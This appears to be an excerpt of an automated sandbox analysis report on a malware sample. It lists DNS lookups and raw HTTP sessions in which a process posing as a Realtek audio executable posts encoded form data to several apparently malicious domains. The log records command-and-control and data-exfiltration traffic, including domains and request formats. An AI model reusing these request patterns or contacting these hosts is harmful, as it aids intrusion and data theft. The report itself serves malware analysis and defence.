                                                                                  Dec 4, 2024 17:11:47.511481047 CET9.9.9.9192.168.11.200xd85eNo error (0)www.thaor56.onlinethaor56.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 4, 2024 17:11:47.511481047 CET9.9.9.9192.168.11.200xd85eNo error (0)thaor56.online202.92.5.23A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:12:02.194847107 CET9.9.9.9192.168.11.200xa63No error (0)www.earbudsstore.shop194.195.220.41A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:12:16.165565014 CET9.9.9.9192.168.11.200x1e84No error (0)www.superiorfencing.netsuperiorfencing.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 4, 2024 17:12:16.165565014 CET9.9.9.9192.168.11.200x1e84No error (0)superiorfencing.net103.230.159.86A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:12:30.620985031 CET9.9.9.9192.168.11.200x68e2No error (0)www.beylikduzu616161.xyz172.67.180.246A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:12:30.620985031 CET9.9.9.9192.168.11.200x68e2No error (0)www.beylikduzu616161.xyz104.21.31.242A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:12:44.488358974 CET9.9.9.9192.168.11.200xa018No error (0)www.zxyck.net118.107.250.103A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:12:59.123431921 CET9.9.9.9192.168.11.200x414bNo error (0)www.dailyfuns.info209.74.77.109A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:13:12.903084993 CET9.9.9.9192.168.11.200x775No error (0)www.mydreamdeal.click104.21.27.59A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:13:12.903084993 CET9.9.9.9192.168.11.200x775No error (0)www.mydreamdeal.click172.67.169.6A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:13:26.660473108 CET9.9.9.9192.168.11.200x91dcNo error (0)www.maitreyatoys.world194.245.148.189A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:13:40.621615887 CET9.9.9.9192.168.11.200x1323No error (0)www.dating-apps-az-dn5.xyz199.59.243.227A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:13:54.460865021 CET9.9.9.9192.168.11.200x3fd2No error (0)www.yc791022.asia101.35.209.183A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:14:08.889544010 CET9.9.9.9192.168.11.200xccccNo error (0)www.nieuws-july202541.sbsnieuws-july202541.sbsCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 4, 2024 17:14:08.889544010 CET9.9.9.9192.168.11.200xccccNo error (0)nieuws-july202541.sbs162.0.215.33A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:14:22.605808020 CET9.9.9.9192.168.11.200x6d63No error (0)www.wcq77.topwcq77.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Dec 4, 2024 17:14:22.605808020 CET9.9.9.9192.168.11.200x6d63No error (0)wcq77.top154.23.184.194A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:14:37.217858076 CET9.9.9.9192.168.11.200x1198No error (0)www.oztalkshw.store199.59.243.227A (IP address)IN (0x0001)false
                                                                                  Dec 4, 2024 17:15:00.779630899 CET9.9.9.9192.168.11.200x7bfdName error (3)www.75178.clubnonenoneA (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • www.zkdamdjj.shop
                                                                                  • www.orbitoasis.online
                                                                                  • www.thaor56.online
                                                                                  • www.earbudsstore.shop
                                                                                  • www.superiorfencing.net
                                                                                  • www.beylikduzu616161.xyz
                                                                                  • www.zxyck.net
                                                                                  • www.dailyfuns.info
                                                                                  • www.mydreamdeal.click

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.11.2049710172.67.187.114807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:11:07.915575027 CET489OUTGET /vluw/?h7i-=tZtx&IUY=Qny9vPKZpQxlYqiENFuqCTovdcuESvtoVbvPUumHvVgYiZzoUIcT00pHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G7wrUY6Sf9n2bmecGwgkPVQzmhsXBPGmPUbE= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.zkdamdjj.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Dec 4, 2024 17:11:08.870114088 CET1280INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Wed, 04 Dec 2024 16:11:08 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                  x-redirect-by: WordPress
                                                                                  location: https://zkdamdjj.shop/vluw/?h7i-=tZtx&IUY=Qny9vPKZpQxlYqiENFuqCTovdcuESvtoVbvPUumHvVgYiZzoUIcT00pHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G7wrUY6Sf9n2bmecGwgkPVQzmhsXBPGmPUbE=
                                                                                  x-litespeed-cache-control: public,max-age=3600
                                                                                  x-litespeed-tag: 02a_HTTP.404,02a_HTTP.301,02a_404,02a_URL.a6d5303f744e03a41043b4a748aa35ee,02a_
                                                                                  x-litespeed-cache: miss
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tpCma0BBbx1luIGlV%2FQLX%2FhJxm2heKw8mLnjVq8mYuAAz486ZPp%2FAeOao5ZRqXloLukcOiWyN0RtyMhiuL33kjqhjJiOagkHVd3yylax%2BwGIDfV4h65IQr%2Fri%2F3ePdRvRPnK%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ecd120edb445f1f-MIA
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=124148&min_rtt=124148&rtt_var=62074&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=489&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.11.204971966.29.132.194807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:11:33.455607891 CET769OUTPOST /k6yn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.orbitoasis.online
                                                                                  Origin: http://www.orbitoasis.online
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Connection: close
                                                                                  Referer: http://www.orbitoasis.online/k6yn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 67 50 42 36 32 5a 47 32 79 50 65 30 50 6d 62 50 61 63 6c 65 76 75 48 76 45 39 4e 61 4c 32 51 6c 49 53 38 74 31 48 76 4b 75 31 68 76 34 78 67 47 6f 42 64 61 4a 35 67 59 4f 34 58 56 46 69 41 47 57 73 76 6d 36 51 67 68 59 73 4d 4a 31 65 74 30 50 4b 4a 69 30 41 61 49 35 35 6f 66 69 50 34 50 66 4b 75 57 69 37 56 4e 67 47 46 59 31 39 6a 73 6e 4f 41 67 7a 47 72 33 38 6b 59 54 6f 42 6b 5a 69 72 5a 6a 30 4a 6d 46 32 6c 46 34 34 59 62 74 6c 32 52 46 6b 67 4d 32 44 48 48 6c 66 4a 42 58 38 78 36 4e 39 51 55 59 6d 74 6d 4d 44 33 61 4a 6d 6f 36 45 6f 34 32 47 45 65 78 4f 4e 47 4d 4e 79 41 3d 3d
                                                                                  Data Ascii: IUY=gPB62ZG2yPe0PmbPaclevuHvE9NaL2QlIS8t1HvKu1hv4xgGoBdaJ5gYO4XVFiAGWsvm6QghYsMJ1et0PKJi0AaI55ofiP4PfKuWi7VNgGFY19jsnOAgzGr38kYToBkZirZj0JmF2lF44Ybtl2RFkgM2DHHlfJBX8x6N9QUYmtmMD3aJmo6Eo42GEexONGMNyA==
                                                                                  Dec 4, 2024 17:11:33.653476954 CET1289INHTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: gzip
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 04 Dec 2024 16:11:33 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
                                                                                  Data Raw: 31 33 34 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 8f 2f 33 ab 2b eb b7 df 7e 7b fc 27 76 c9 ac 0d 85 1b 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 35 9d 6f bf 5d 7e 26 6e 65 82 19 55 7e ef 1e eb b0 79 ba 63 b2 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 59 94 6e f5 54 57 de 3d 79 f7 29 1d d3 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 14 a6 9f 98 ff c8 0a ae cb c3 c2 2d af 96 20 ef a8 a7 66 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 9a f1 7d 69 9b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 ce aa c1 34 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab da ca 9c d3 e0 ef 97 a9 fd 67 df 3c a0 9d 7b cf 4c c2 f8 f4 30 a0 0a b0 ed 97 81 e0 c6 8d 5b 85 b6 f9 65 50 9a 69 79 5f ba 45 e8 fd e5 c7 65 65 78 76 1f 06 28 91 77 ef [TRUNCATED]
                                                                                  Data Ascii: 134FZrHr?OAa{7j$A$@$Hn85d.PRbKpD#+/3+~{'vU5o]~&neU~ycr:~z{YnTW=y)~}W>]- f>5YQ]MkCmea}i~NF @4S~|VeYbwE]vYg<{L0[ePiy_Eeexv(w0u7%0r8Fl~e_2Y0gO{8#rq'f~U_Y7p2M+`=L]hf/}"x+@d{^v#^K{jyYU]8j?DkYzlxg&Se^}UZ>Rx&#?_|A:6+)o92?I7d#8''@[YUeM^_WXBGWxGV^5\Y}q+|g|qW&0jDLFo^19_G5m{Z^b1/Vz 2xc7+w7;<[^G;\,ml[z7/hK901[3~{Yr@K~y?@q/I:d9oj0}^/5FF7?u`}s9C <.#ku~^OH_3ymnQ{3+/Kz [TRUNCATED]
                                                                                  Dec 4, 2024 17:11:33.653677940 CET1289INData Raw: 01 ff 69 1f 06 41 e8 38 6e fa c6 52 3f da b7 ab fc 74 41 f6 b3 5f bf 9f f7 c6 7e bf e2 96 b5 0f b3 48 3f f1 bb 57 fc 18 e5 6f 28 5e 22 e9 07 87 a2 9e ca 8b 96 26 b7 e7 82 1b 12 bf ee e5 57 44 df 7b 7a 3f d0 b7 6b d4 fe e8 71 bf be ef 83 17 16 20
                                                                                  Data Ascii: iA8nR?tA_~H?Wo(^"&WD{z?kq \A;g?T=P{?B`x!YkaQ7zl~sVusGo^EBnngALjQ2.aS/Y#
                                                                                  Dec 4, 2024 17:11:33.653690100 CET1289INData Raw: 32 b5 4d c6 96 12 a8 63 fb 6c 0e 39 86 57 f9 dc 1f ad d3 c3 39 d9 d2 96 3e ae b8 2e 0a 36 2d 3e 3a 9d 71 81 49 90 23 d7 70 fb 09 33 6e 58 63 ef 6e 29 35 48 e7 91 aa f3 70 38 96 d9 94 59 c0 41 6b 35 b3 62 94 84 ca 5c 58 9b 4b 6e 48 74 39 cd 17 31
                                                                                  Data Ascii: 2Mcl9W9>.6->:qI#p3nXcn)5Hp8YAk5b\XKnHt91"PSN\F^9q-/ej"/!A)VE5V#jKm;cKW,H rClJX\NrmJ&fO|V6]`A1U<5gO;"J><C&'6pAn%
                                                                                  Dec 4, 2024 17:11:33.653712034 CET1289INData Raw: ae bd f5 22 2e 71 18 ca 0d fc da ad d7 89 5c 41 65 10 69 ee dc c1 9b d1 38 55 26 b6 cc ce 84 26 63 21 a8 73 9a 3c 03 c7 3b 26 1f ae bc 8c ef 84 f2 80 9c a6 80 07 41 af cb 71 99 6c 02 52 14 36 bc d8 ce aa c5 69 5c cb 23 c5 85 5b 2a 2d e8 6e 99 52
                                                                                  Data Ascii: ".q\Aei8U&&c!s<;&AqlR6i\#[*-nRI\-J=?i1%<)cZ/vV!K,M.YzQLsSM5ut4vl4!.U`7[vMmn5f<oW7
                                                                                  Dec 4, 2024 17:11:33.653912067 CET79INData Raw: fa 67 c0 7c af b3 97 a2 e2 dd 37 e6 7b 7d f1 bf ff 0b 54 80 d0 d1 e0 9a da 07 26 7b 36 9b 79 63 90 f7 f8 7a 84 af ad f6 08 3f e7 af c7 cb 33 b9 6f bf fd 0f 00 00 00 ff ff 0d 0a 41 0d 0a 03 00 1c 42 38 78 84 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: g|7{}T&{6ycz?3oAB8x'0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.11.204972066.29.132.194807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:11:36.172779083 CET789OUTPOST /k6yn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.orbitoasis.online
                                                                                  Origin: http://www.orbitoasis.online
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Referer: http://www.orbitoasis.online/k6yn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 67 50 42 36 32 5a 47 32 79 50 65 30 4f 46 54 50 4a 74 6c 65 74 4f 48 73 59 74 4e 61 65 47 52 4e 49 54 41 74 31 47 37 67 76 44 78 76 35 51 51 47 76 41 64 61 4f 35 67 59 46 59 58 4d 4c 43 41 37 57 73 79 5a 36 54 34 68 59 74 6f 4a 31 66 64 30 4f 37 4a 39 31 51 61 4b 73 70 6f 64 39 66 34 50 66 4b 75 57 69 37 42 7a 67 43 52 59 31 4f 72 73 6e 73 34 6a 2b 6d 72 77 32 45 59 54 69 52 6b 64 69 72 5a 52 30 4c 53 2f 32 6e 39 34 34 64 6e 74 69 6e 52 47 76 67 4d 73 41 33 47 32 50 62 4d 67 77 67 6d 6c 2b 44 38 49 6a 63 7a 77 4c 42 58 54 37 61 4f 67 72 72 71 30 41 75 49 6d 50 45 4e 57 76 4f 34 2f 76 65 32 37 6b 37 43 72 6f 34 51 37 41 69 2f 31 58 77 34 3d
                                                                                  Data Ascii: IUY=gPB62ZG2yPe0OFTPJtletOHsYtNaeGRNITAt1G7gvDxv5QQGvAdaO5gYFYXMLCA7WsyZ6T4hYtoJ1fd0O7J91QaKspod9f4PfKuWi7BzgCRY1Orsns4j+mrw2EYTiRkdirZR0LS/2n944dntinRGvgMsA3G2PbMgwgml+D8IjczwLBXT7aOgrrq0AuImPENWvO4/ve27k7Cro4Q7Ai/1Xw4=
                                                                                  Dec 4, 2024 17:11:36.368922949 CET1289INHTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: gzip
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 04 Dec 2024 16:11:36 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
                                                                                  Data Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 8f 2f 33 ab 2b eb b7 df 7e 7b fc 27 76 c9 ac 0d 85 1b 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 35 9d 6f bf 5d 7e 26 6e 65 82 19 55 7e ef 1e eb b0 79 ba 63 b2 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 59 94 6e f5 54 57 de 3d 79 f7 29 1d d3 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 14 a6 9f 98 ff c8 0a ae cb c3 c2 2d af 96 20 ef a8 a7 66 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 9a f1 7d 69 9b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 ce aa c1 34 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab da ca 9c d3 e0 ef 97 a9 fd 67 df 3c a0 9d 7b cf 4c c2 f8 f4 30 a0 0a b0 ed 97 81 e0 c6 8d 5b 85 b6 f9 65 50 9a 69 79 5f ba 45 e8 fd e5 c7 65 65 78 76 1f 06 28 91 77 ef [TRUNCATED]
                                                                                  Data Ascii: 1359ZrHr?OAa{7j$A$@$Hn85d.PRbKpD#+/3+~{'vU5o]~&neU~ycr:~z{YnTW=y)~}W>]- f>5YQ]MkCmea}i~NF @4S~|VeYbwE]vYg<{L0[ePiy_Eeexv(w0u7%0r8Fl~e_2Y0gO{8#rq'f~U_Y7p2M+`=L]hf/}"x+@d{^v#^K{jyYU]8j?DkYzlxg&Se^}UZ>Rx&#?_|A:6+)o92?I7d#8''@[YUeM^_WXBGWxGV^5\Y}q+|g|qW&0jDLFo^19_G5m{Z^b1/Vz 2xc7+w7;<[^G;\,ml[z7/hK901[3~{Yr@K~y?@q/I:d9oj0}^/5FF7?u`}s9C <.#ku~^OH_3ymnQ{3+/Kz [TRUNCATED]
                                                                                  Dec 4, 2024 17:11:36.368933916 CET1289INData Raw: 01 ff 69 1f 06 41 e8 38 6e fa c6 52 3f da b7 ab fc 74 41 f6 b3 5f bf 9f f7 c6 7e bf e2 96 b5 0f b3 48 3f f1 bb 57 fc 18 e5 6f 28 5e 22 e9 07 87 a2 9e ca 8b 96 26 b7 e7 82 1b 12 bf ee e5 57 44 df 7b 7a 3f d0 b7 6b d4 fe e8 71 bf be ef 83 17 16 20
                                                                                  Data Ascii: iA8nR?tA_~H?Wo(^"&WD{z?kq \A;g?T=P{?B`x!YkaQ7zl~sVusGo^EBnngALjQ2.aS/Y#
                                                                                  Dec 4, 2024 17:11:36.369004965 CET1289INData Raw: 32 b5 4d c6 96 12 a8 63 fb 6c 0e 39 86 57 f9 dc 1f ad d3 c3 39 d9 d2 96 3e ae b8 2e 0a 36 2d 3e 3a 9d 71 81 49 90 23 d7 70 fb 09 33 6e 58 63 ef 6e 29 35 48 e7 91 aa f3 70 38 96 d9 94 59 c0 41 6b 35 b3 62 94 84 ca 5c 58 9b 4b 6e 48 74 39 cd 17 31
                                                                                  Data Ascii: 2Mcl9W9>.6->:qI#p3nXcn)5Hp8YAk5b\XKnHt91"PSN\F^9q-/ej"/!A)VE5V#jKm;cKW,H rClJX\NrmJ&fO|V6]`A1U<5gO;"J><C&'6pAn%
                                                                                  Dec 4, 2024 17:11:36.369015932 CET1289INData Raw: ae bd f5 22 2e 71 18 ca 0d fc da ad d7 89 5c 41 65 10 69 ee dc c1 9b d1 38 55 26 b6 cc ce 84 26 63 21 a8 73 9a 3c 03 c7 3b 26 1f ae bc 8c ef 84 f2 80 9c a6 80 07 41 af cb 71 99 6c 02 52 14 36 bc d8 ce aa c5 69 5c cb 23 c5 85 5b 2a 2d e8 6e 99 52
                                                                                  Data Ascii: ".q\Aei8U&&c!s<;&AqlR6i\#[*-nRI\-J=?i1%<)cZ/vV!K,M.YzQLsSM5ut4vl4!.U`7[vMmn5f<oW7
                                                                                  Dec 4, 2024 17:11:36.369021893 CET74INData Raw: f5 cf 80 f9 5e 67 2f 45 c5 bb 6f cc f7 fa e2 7f ff 17 a8 00 a1 a3 c1 35 b5 0f 4c f6 6c 36 f3 c6 20 ef f1 f5 08 5f 5b ed 11 7e ce 5f 8f 97 67 72 df 7e fb 1f 00 00 00 ff ff 03 00 63 d9 00 c2 84 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ^g/Eo5Ll6 _[~_gr~c'0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.11.204972166.29.132.194807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:11:38.891185999 CET2578OUTPOST /k6yn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.orbitoasis.online
                                                                                  Origin: http://www.orbitoasis.online
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 7368
                                                                                  Connection: close
                                                                                  Referer: http://www.orbitoasis.online/k6yn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 67 50 42 36 32 5a 47 32 79 50 65 30 4f 46 54 50 4a 74 6c 65 74 4f 48 73 59 74 4e 61 65 47 52 4e 49 54 41 74 31 47 37 67 76 44 35 76 35 6d 6b 47 76 6a 46 61 50 35 67 59 47 59 58 52 4c 43 41 71 57 73 37 51 36 55 77 62 59 76 67 4a 31 38 56 30 48 76 6c 39 37 51 61 4b 7a 5a 6f 51 69 50 34 67 66 4f 79 61 69 37 52 7a 67 43 52 59 31 50 37 73 68 2b 41 6a 74 32 72 33 38 6b 59 58 6f 42 6b 6c 69 71 77 6d 30 4c 57 76 32 57 64 34 34 39 58 74 6a 52 4e 47 7a 77 4d 71 4a 6e 48 78 50 62 41 2f 77 67 36 70 2b 43 49 6d 6a 64 72 77 4a 67 71 50 73 72 4f 58 2b 35 79 74 63 4e 6b 46 42 45 67 41 67 4f 52 41 73 49 79 67 6b 50 66 6e 68 36 59 59 52 52 2f 44 47 33 51 68 6e 49 68 6f 7a 4f 39 52 59 6a 53 78 71 56 32 56 2b 5a 35 7a 63 38 4b 42 61 32 34 6c 5a 6d 5a 35 6a 6b 35 66 44 2f 49 37 4c 48 39 4b 48 33 2f 6d 72 37 2b 68 55 56 37 5a 2b 63 30 71 33 32 2b 64 57 37 6a 6d 49 56 69 79 52 59 36 4e 37 52 58 62 52 45 73 4d 34 72 6c 6d 47 65 4c 41 74 57 67 58 33 6a 37 33 63 79 4d 76 43 48 50 64 4b 5a 37 42 79 56 43 35 44 5a [TRUNCATED]
                                                                                  Data Ascii: IUY=gPB62ZG2yPe0OFTPJtletOHsYtNaeGRNITAt1G7gvD5v5mkGvjFaP5gYGYXRLCAqWs7Q6UwbYvgJ18V0Hvl97QaKzZoQiP4gfOyai7RzgCRY1P7sh+Ajt2r38kYXoBkliqwm0LWv2Wd449XtjRNGzwMqJnHxPbA/wg6p+CImjdrwJgqPsrOX+5ytcNkFBEgAgORAsIygkPfnh6YYRR/DG3QhnIhozO9RYjSxqV2V+Z5zc8KBa24lZmZ5jk5fD/I7LH9KH3/mr7+hUV7Z+c0q32+dW7jmIViyRY6N7RXbREsM4rlmGeLAtWgX3j73cyMvCHPdKZ7ByVC5DZ4RTw2kQxO43F9UnJkQzcxZPG9jSj26qFtENQWXQUE7awLc6UbdmFRPd5EPfH4eL2k16stNegcaGNVIzRxKi+RaQ4hnkhp8yOv5uyukMiqV6XPFPAHtkKTTDRPrF3cED24tnSiwAwvP3kD+4sUCKslfYx/5+/Z43JKrNwWI3o6k5ZGRG5zZq0BplPfENrpjciq7u6G5oXrO6zSi4GdP9Zv4FySU+VBdv+GIzQl0nuBIdDt/35ruMxGiLyEFlqQFFsy+U7rwX9ZLdf6pBh++C8/r5R4GpmMIxOBnYU+AiCSjVO/oOKOJ5eRqm6EyQe2xihfb4B/7QDA/yaN922R55aITW3W3Vb3ZLvn/UFvb2x2Ipgd12JfiahEs1NTzrSKIIV5x5TM5z8lF6Smw+4t8P8/rTgRJ+Ss+3H2IXECsIsdO0sO2cMfR9VZk0r6GYRJoynoVBWIh4uo02vSUoiwYsoXQCsvAeQRGoQDyL1p0Gzw9OCfl3E/qujTn/FdG7N30witEfeKiH/sdLZf0zjj4bet7urfkmGqeRCzt0kdd7YYXMEhL0GOMQJWCs6HaHYPcpBrfJa+FG7jkROPMYroRzAEexUiEAMMLye1JUqAboKFSet7OR46yo3bJskW+uyttN16z/0KHVNWapWKUKMx8YyHqKX1oDtpBc9mg [TRUNCATED]
                                                                                  Dec 4, 2024 17:11:38.891259909 CET5360OUTData Raw: 79 4c 48 74 54 39 6a 45 6c 69 73 4f 79 6f 6a 79 70 64 4f 31 47 59 44 32 65 58 4c 72 53 59 37 2f 48 74 79 69 72 61 78 33 79 38 51 62 77 7a 68 6d 63 74 45 6c 4c 61 44 70 4c 6c 2b 55 6f 68 78 67 6a 76 44 77 56 78 4a 49 41 5a 33 35 6e 53 61 6f 47 76
                                                                                  Data Ascii: yLHtT9jElisOyojypdO1GYD2eXLrSY7/Htyirax3y8QbwzhmctElLaDpLl+UohxgjvDwVxJIAZ35nSaoGvsQEb2Onljbi0C84E18GXiZpgA5FnILu39yUMW8zB54yr7W7yoj1ucIJ9Mg3n2tKxLzBXQ6Agp/jvWXC70uPRQBHuW0GTNUQIeHVTELy83w1p8bgXgf1mslMYdrq/Ipxip4MCUpXiP9Sbvyth77/vv4+EUhJm20jdK
                                                                                  Dec 4, 2024 17:11:39.113266945 CET1289INHTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: gzip
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 04 Dec 2024 16:11:39 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
